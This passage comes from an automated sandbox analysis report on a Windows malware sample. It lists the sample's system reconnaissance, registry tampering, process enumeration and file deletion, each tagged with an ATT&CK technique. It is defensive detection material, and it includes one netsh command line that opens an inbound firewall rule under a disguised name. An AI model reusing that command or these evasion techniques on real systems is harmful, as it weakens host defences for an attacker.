loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F900000\n \"jaigqlsg.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F900000\n \"svchost.exe\" loaded module \"%WINDIR%\\System32\\dbghelp.dll\" at 6F900000", "origin": "Loaded Module", "attck_id": "T1518.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518/001"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "api-10", "type": 6, "relevance": 6, "name": "Queries kernel debugger information", "description": "\"netsh.exe\" at 00000000-00004188-00000105-6315746", "origin": "API Call", "attck_id": "T1622", "attck_id_wiki": "https://attack.mitre.org/techniques/T1622"}, {"threat_level_human": "informative", "category": "Anti-Detection/Stealthyness", "identifier": "registry-179", "type": 3, "relevance": 1, "name": "Tries to map intranet network resources to internet zone", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"UNCASINTRANET\"; Value: \"00000000\")", "origin": "Registry Access", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-39", "type": 6, "relevance": 8, "name": "Queries volume information of an entire harddrive", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" queries volume information of \"C:\\\" at 00000000-00005976-0000010C-1260821\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" queries volume information of \"C:\\\" at 00000000-00005976-0000010C-1262031\n \"jaigqlsg.exe\" queries volume information of \"C:\\\" at 00000000-00004216-0000010C-1450610\n \"jaigqlsg.exe\" queries volume information of \"C:\\\" at 00000000-00004216-0000010C-1451820\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003600-0000010C-36718\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003600-0000010C-1021468\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003600-0000010C-1832670\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003600-0000010C-1834083", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c527743794e75ffffffff0c0000004c6252771f794e75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e490000000000 (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031006a0600000088ea8775ecf91200b344416a88000000000000000000000000000000000000000000000000000000880000000000000000000000000000002c6b400074be13b0bcf51200616b400088000000f822410081a88775ecf912000000900100eec500000200000800000015305d00 (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetVersionExA\" with parameter 9c0000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000200000000000000d8eb7575f81f2b000070fd7f9a5c547700e0fd7fb0c9ae014470fd7f00000000400000003f000000240000000070fd7fa4c9ae01c15c547760825b77240000000070fd7f9a5c547700e0fd7fc8c9ae015789537780835b7713174f75d8eb7575 (UID: 00000000-00005976)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000078772c0084f65f00145c5377435c537750f75f000100000094012a000100000004f65f00935c547740835b77d4a05377d5910b7750f75f00010000000100000040e82c0000000000d4f55f0004f65f0070f65f0095e14f7729630700feffffffd4a053771bbe4e750000e27500000000 (UID: 00000000-00006096)\n \"sc.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000789724002cf94200145c5377435c5377f8f94200010000009401220001000000acf84200935c547740835b77d4a05377a7891677f8f942000100000001000000c8e42400000000007cf84200acf8420018f9420095e14f77f3750700feffffffd4a053771bbe4e750000e27500000000 (UID: 00000000-00003764)\n \"jaigqlsg.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000060dc20003cfc3d00145c5377435c537708fd3d000100000094011e0001000000bcfb3d00935c547740835b77d4a053778f81697708fd3d00010000000100000008ea2000000000008cfb3d00bcfb3d0028fc3d0095e14f77cb7e0700feffffffd4a053771bbe4e750000e27500000000 (UID: 00000000-00004216)\n \"jaigqlsg.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001c5c527743794e75ffffffff0c0000004c6252771f794e75ffffffff0c00000064ec120004000000000400000100000078ec12000a0e2e0000000000 (UID: 00000000-00004216)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-11", "type": 6, "relevance": 2, "name": "Queries volume information", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" queries volume information of \"C:\\\" at 00000000-00005976-0000010C-1260821\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" queries volume information of \"C:\\\" at 00000000-00005976-0000010C-1262031\n \"jaigqlsg.exe\" queries volume information of \"C:\\\" at 00000000-00004216-0000010C-1450610\n \"jaigqlsg.exe\" queries volume information of \"C:\\\" at 00000000-00004216-0000010C-1451820\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003600-0000010C-36718\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003600-0000010C-1021468\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003600-0000010C-1832670\n \"svchost.exe\" queries volume information of \"C:\\\" at 00000000-00003600-0000010C-1834083", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00005976)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-225", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve the host name of a computer", "description": "\"svchost.exe\" called \"gethostname\" with parameter %OSUSER%-PC & 128 (UID: 00000000-00003600)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-142", "type": 6, "relevance": 3, "name": "Calls an API possibly used to retrieve a handle to the foreground window", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetForegroundWindow\" (UID: 00000000-00005976)", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-55", "type": 3, "relevance": 10, "name": "Reads the registry for installed applications", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\SC.EXE\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\CMD.EXE\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\APP PATHS\\NETSH.EXE\")", "origin": "Registry Access", "attck_id": "T1518", "attck_id_wiki": "https://attack.mitre.org/techniques/T1518"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"netsh.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00004188)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-39", "type": 1, "relevance": 10, "name": "Makes a code branch decision directly after an API that is environment aware", "description": "Found API call GetTimeZoneInformation@KERNEL32.DLL directly followed by \"cmp eax, 02h\" and \"jne 0040B33Dh\" at 00000000-00005976-36109-269-0040B211", "origin": "Hybrid Analysis Technology", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001200780e7f00fce2120080f4787500007f000000000089f47875fcb910b00200000070e312006ce3120064e2120068e2120018e4120095e14f7703230700c0e21200c83a827534e31200d58c7a7570e3120004e3120042a47875a802827544e31200d2f47875080000006ef5787544f5787544b810b00200000070aa906f0000130026bb906f18e31200020000000000130070aa906f48e3120042a47875a80282758ce3120010a9906f08000000e6a8906fa2b510b10200000070aa906f0000130026bb906fac0e7f00780e7f0058e3120080509c6f18e41200f9f2946fc6fe92de (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000895e688a0300000044e5ae0194afafb1ac1600008ce5ae01c0e4ae01590000000300000048e4ae0150e4ae0118e6ae01d0bb426aa0db45dafeffffff98e5ae01bfe5416a895e688a98e5ae01cce5416a060000000000516a01000000dfe5416a3333ff040600000002000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f4e5ae01000000008e00000044e6ae01feffffffcce5ae01cf005477d6005477dfdafa768e0000004700000044e6ae0100000000a0e5ae010000000008e6ae01 (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000007b00370035003800340037003100370037002d0046003000370037002d0034003100370031002d0042004400320043002d0041003600420042003200310036008303b0b044deae016d82d0751c192b0004010000 (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006500340062006300300062003000370038003100360066003600320063003800610031006100030000000000000002000000a01e2b00d84b2500f86c23003200020001000000260200000b0000000000000000000000e04b2500f40100000a000000c071230005000000000000003200000080262b00f0c8ae01cc415477a01e2b0028000000fc000000ff2b5377e3f7fa76d8eb7575ac0123000000230029002f00010000000000ffff7305000004000000010000002a002a00010000001a00000001000000000000000000000008702300f8070000200000000000000000000000 (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000230048882d00000000003e00003e340000c0708a2d00e89d2d0038122a00f0010000000023000400000048882d00aceeae010464537738012300e0635377bfd1fa76000000000000230050882d006dd18775997da0b16caef7760000000000000000f0010000e89d2d00d82f23000100000000002300500123000c00000050882d00d82f2300020000021800000040220062820000000000000000000000030000004ceeae01820000007f070000000000004022006202000000c0758f75e89d2d0000000000c0758f7568eeae01e830230000000000d82f2300c0eeae01ff2b5377 (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000000000000000009c335bd20300000044e5ae0194afafb1101000008ce5ae01c0e4ae015b0000000300000048e4ae0150e4ae0118e6ae01d0bb426aa0db45dafeffffff98e5ae01bfe5416a9c335bd298e5ae01cce5416a820500000000516a01000000dfe5416a3333ff048205000003000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000230048812d00000000003e00003e340000c070832d00e89d2d00e8862d00f0010000000023000400000048812d00aceeae010464537738012300e0635377bfd1fa76000000000000230050812d006dd18775997da0b16caef7760000000000000000e0000000e89d2d00d82f23000100000000002300500123000c00000050812d00d82f23000200000218000000f00200f2820000000000000000000000030000004ceeae01820000007002000000000000cc2f00e302000000c0758f7588412e0000000000c0758f7568eeae014830230000000000d82f2300c0eeae01ff2b5377 (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b00200031000000000000000000043e250d0300000044e5ae0194afafb1d41700008ce5ae01c0e4ae015b0000000300000048e4ae0150e4ae0118e6ae01d0bb426aa0db45dafeffffff98e5ae01bfe5416a043e250d98e5ae01cce5416a820500000000516a01000000dfe5416a3333ff048205000005000000000000000000000000010000000300000004000000010000000000000001cf6d6c0c6e496e6465780000000000000000000000000000000000000000000000000000010000000000000000020000000300000004000000010000000000000001cf6d6c0c2461706952657475726e0000 (UID: 00000000-00005976)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"IsWow64Process\" with parameter \"5976\" - (UID: 00000000-00005976)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"sc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")\n \"jaigqlsg.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-149", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve default language settings", "description": "\"netsh.exe\" called \"GetSystemDefaultLangID\" (UID: 00000000-00004188)", "origin": "API Call", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-102", "type": 6, "relevance": 5, "name": "Calls an API typically used for searching a directory for files", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"FindFirstFileW\" with parameter C:\\cmd.* (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\cmd.* (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"FindNextFileW\" with parameter cmd.exe (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"FindFirstFileW\" with parameter C:\\sc.* (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\sc.* (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"FindNextFileW\" with parameter sc.exe (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"FindFirstFileW\" with parameter C:\\netsh.* (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"FindFirstFileW\" with parameter %WINDIR%\\system32\\netsh.* (UID: 00000000-00005976)\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"FindNextFileW\" with parameter netsh.exe (UID: 00000000-00005976)", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-108", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve information about the current system", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}\n \"netsh.exe\" called \"GetNativeSystemInfo\" with parameters {\"lpSystemInfo\": \"000000000010000000000100fffffe7f03000000040000004a020000000001000600004f\"}", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-153", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieves adapter information", "description": "\"svchost.exe\" called \"GetAdaptersInfo\" with parameter \"000000000c0000007b30374234314637392d314145432d343738322d413645382d3843323846464241333545447d000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000496e74656c2852292050524f2f31303030204d54204e6574776f726b20436f6e6e656374696f6e00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000006000000029cfea2d81900000c000000060000000100000000000000000000003139322e3136382e302e3200000000003235352e3235352e3235352e30000000c0a80002000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000003139322e3136382e302e3100000000003235352e3235352e3235352e32353500c0a80001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000432eee671f34ee670000000000000000\" - (UID: 00000000-00003600)", "origin": "API Call", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"cmd.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"sc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jaigqlsg.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"jaigqlsg.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"8\"\n \"th32ProcessID\": \"0\"}\n \"netsh.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}\n \"svchost.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-170", "type": 6, "relevance": 5, "name": "Calls an API typically used to retrieve the current status of the specified service", "description": "\"sc.exe\" called \"QueryServiceStatusEx\" with parameters {\"hService\": \"161c00\"\n \"InfoLevel\": \"0\"\n \"lpBuffer\": \"785360\"\n \"cbBufSize\": \"36\"\n \"pcbBytesNeeded\": \"36\"}", "origin": "API Call", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "api-219", "type": 6, "relevance": 3, "name": "Calls an API typically used to register an interface (RPC)", "description": "\"netsh.exe\" called \"RpcServerRegisterIf2\" (UID: 00000000-00004188)", "origin": "API Call", "attck_id": "T1021", "attck_id_wiki": "https://attack.mitre.org/techniques/T1021"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "target-186", "type": 9, "relevance": 2, "name": "Detects NETSH process execution", "description": "Process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of Windows\" dir=in action=allow program=\"%WINDIR%\\\\system32\\\\svchost.exe\" enable=yes>nul\" (UID: 00000000-00004188)", "origin": "Monitored Target", "attck_id": "T1562.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/004"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "network-38", "type": 7, "relevance": 3, "name": "Uses HTTPS for communication", "description": "HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"\n HTTPS traffic to \"<IPv4>\" on port \"443\"", "origin": "Network Traffic", "attck_id": "T1573", "attck_id_wiki": "https://attack.mitre.org/techniques/T1573"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" opened \"\\Device\\KsecDD\"\n \"netsh.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"LDAPCLIENTINTEGRITY\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEOLDHOSTRESOLUTIONORDER\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"USEHOSTNAMEASALIAS\"; Value: \"\")\n \"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\LDAP\"; Key: \"IPV4LOOPBACKALTERNATIVE\"; Value: \"\")\n \"jaigqlsg.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\PLTDKEGK\"; Key: \"IMAGEPATH\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"cmd.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Local\\Temp\\jaigqlsg.exe\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "General", "identifier": "api-6", "type": 6, "relevance": 4, "name": "Reads configuration files (.ini files)", "description": "\"2087167d54553de4bc0b07816f62c8a1a94ca5edd7503bd5add21edd296b5c41.exe\" reads file \"C:\\Users\\%OSUSER%\\Desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": 